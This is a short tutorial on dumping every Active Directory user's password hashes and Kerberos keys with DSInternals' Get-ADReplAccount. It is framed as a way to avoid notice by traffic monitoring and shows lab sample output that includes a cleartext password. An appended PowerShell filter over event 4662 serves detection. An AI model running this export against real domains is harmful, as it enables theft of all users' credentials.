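Quickly exporting domain hashes with PowerShell (DSInternals)

Overview

We all know that the more users a domain has, the larger its NTDS.dit file becomes; the ntds files I have seen are measured in gigabytes at the very least. Pulling such a large ntds file back to a local machine is inconvenient, and the transfer is easily noticed by traffic-monitoring devices.

Using DSInternals

1. PowerShell 5.0: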

Install-Module DSInternals

2. PowerShell 3.0 and 4.0:
Extract the archive, then import the module from the extracted directory:

cd C:\test\DSInternals

Import-Module .\DSInternals

Exporting the hashes of all domain users

Get-ADReplAccount -All -NamingContext 'DC=Adatum,DC=com' -Server LON-DC1

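Example screenshot
As the screenshot above shows, with more than 10,000 users the ntds file is certainly larger than a gigabyte, yet the exported domain hashes amount to only about 200 MB.
The tool has many modules; see the official site for details.

Output: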

DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
Sid: S-1-5-21-3180365339-800773672-3767752645-1375
Guid: 124ae098-699b-4450-a47a-314a29cc90ea
SamAccountName: April
SamAccountType: User
UserPrincipalName: April@adatum.com
PrimaryGroupId: 513
SidHistory:
Enabled: True
Deleted: False
LastLogon:
DisplayName: April Reagan
GivenName: April
Surname: Reagan
Description:
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
NTHashHistory:
Hash 01: 92937945b518814341de3f726500d4ff
Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f
Hash 03: 402bc59d8a00641b7f386e78596340f4
LMHashHistory:
Hash 01: 727e3576618fa1754a3b108f3fa6cb6d
Hash 02: 5a5503d0e85f58abaad3b435b51404ee
Hash 03: f9393d97e7a1873caad3b435b51404ee
SupplementalCredentials:
ClearText: Pa$$w0rd
Kerberos:
Credentials:
DES_CBC_MD5
Key: 76fe3b5bda911a40
OldCredentials:
DES_CBC_MD5
Key: 7f8c4f38e0ea0b80
Salt: ADATUM.COMApril
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: a72c8bc96c4a6f03244f0b0067a1e440
Iterations: 4096
DES_CBC_MD5
Key: 76fe3b5bda911a40
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 034b512ec64286dec951d6aff8d81fa8
Iterations: 4096
DES_CBC_MD5
Key: 7f8c4f38e0ea0b80
Iterations: 4096
OlderCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 29d536ec057f9063747161429b81f056
Iterations: 4096
DES_CBC_MD5
Key: 58f1cbe6e50e1f83
Iterations: 4096
ServiceCredentials:
Salt: ADATUM.COMApril
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e
Hash 02: c993da396914645b356ae7816251fcb1
Hash 03: 6b58530cab34de91189a603e22c2be15
Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e
Hash 05: 5a762cf59fa31023dcba1ebd4725b443
Hash 06: c78bac91c0ba25cae5d44460fd65a73b
Hash 07: 59d73cea16afd1aac6bf8acfa2768621
Hash 08: d2be383db9469a39736d9e2136054131
Hash 09: 079de9f4d94d97a80f1726497dfd1cc2
Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52
Hash 11: 961a36bded5535b8fc15b4b8e6c48b93
Hash 12: 6ac8a60d83e9ae67c2097db716a6af17
Hash 13: e899e577d5f81ef5288ab67de07fad9a
Hash 14: 135452ab86d40c3d47ca849646d5e176
Hash 15: a84c367eaa334d0a4cb98e36da011e0f
Hash 16: 61a458eb70440b1a92639452f0c2c948
Hash 17: 238f4059776c3575be534afb46be4ccf
Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac
Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf
Hash 20: 5f9800d734ebe9fb588def6aaafc40b7
Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3
Hash 22: f1685383b0c131035ae264ee5bd24a8d
Hash 23: 3119e42886b01cad00347e72d0cee594
Hash 24: ebef7f2c730e17ded8cba1ed20122602
Hash 25: 7d99673c9895e0b9c484e430578ee78e
Hash 26: e1e20982753c6a1140c1a8241b23b9ea
Hash 27: e5ec1c63e0e549e49cda218bc3752051
Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6
Hash 29: 84010d657e6b58ce233fae2bd7644222
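
Get-ADReplAccount reads these secrets over the directory replication protocol (MS-DRSR), so on the domain controller the export appears as replication rights exercised by an account that is not a domain controller. The following is an added example, not code from the original post or from the DSInternals project, that filters Security event 4662 records for that pattern; the sample records, the `LON-DC2$` and `svc-report` names and the `Find-SuspectReplication` function are constructed for illustration.

```powershell
# Added example. Replication control access rights (AD schema GUIDs).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Find-SuspectReplication {
    param(
        [Parameter(Mandatory = $true)] [object[]] $Record,           # parsed 4662 records
        [Parameter(Mandatory = $true)] [string[]] $DomainController  # DC machine accounts
    )
    foreach ($r in $Record) {
        if ($r.EventId -ne 4662) { continue }
        # Collect every replication right named in the event's Properties field
        $rights = @(foreach ($guid in $ReplicationRights.Keys) {
            if ($r.Properties -like "*$guid*") { $ReplicationRights[$guid] }
        })
        if ($rights.Count -eq 0) { continue }
        # DC-to-DC replication is expected; any other caller deserves review
        if ($DomainController -contains $r.SubjectUserName) { continue }
        [pscustomobject]@{
            TimeCreated = $r.TimeCreated
            Account     = '{0}\{1}' -f $r.SubjectDomainName, $r.SubjectUserName
            Rights      = ($rights | Sort-Object) -join ', '
        }
    }
}

# Constructed sample records; field names follow event 4662's EventData
$sample = @(
    [pscustomobject]@{ EventId = 4662; TimeCreated = '2024-01-01T02:00:00Z'
        SubjectDomainName = 'ADATUM'; SubjectUserName = 'LON-DC2$'   # DC replication
        Properties = '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}' }
    [pscustomobject]@{ EventId = 4662; TimeCreated = '2024-01-01T02:05:00Z'
        SubjectDomainName = 'ADATUM'; SubjectUserName = 'svc-report' # not a DC
        Properties = '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' }
    [pscustomobject]@{ EventId = 4662; TimeCreated = '2024-01-01T02:06:00Z'
        SubjectDomainName = 'ADATUM'; SubjectUserName = 'April'      # unrelated object access
        Properties = '{bf967aba-0de6-11d0-a285-00aa003049e2}' }
)

# Only the svc-report record is returned
Find-SuspectReplication -Record $sample -DomainController 'LON-DC1$', 'LON-DC2$'
```

On a domain controller with the "Audit Directory Service Access" policy enabled, real records come from Security log event 4662, whose EventData carries the SubjectUserName and Properties fields used here.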
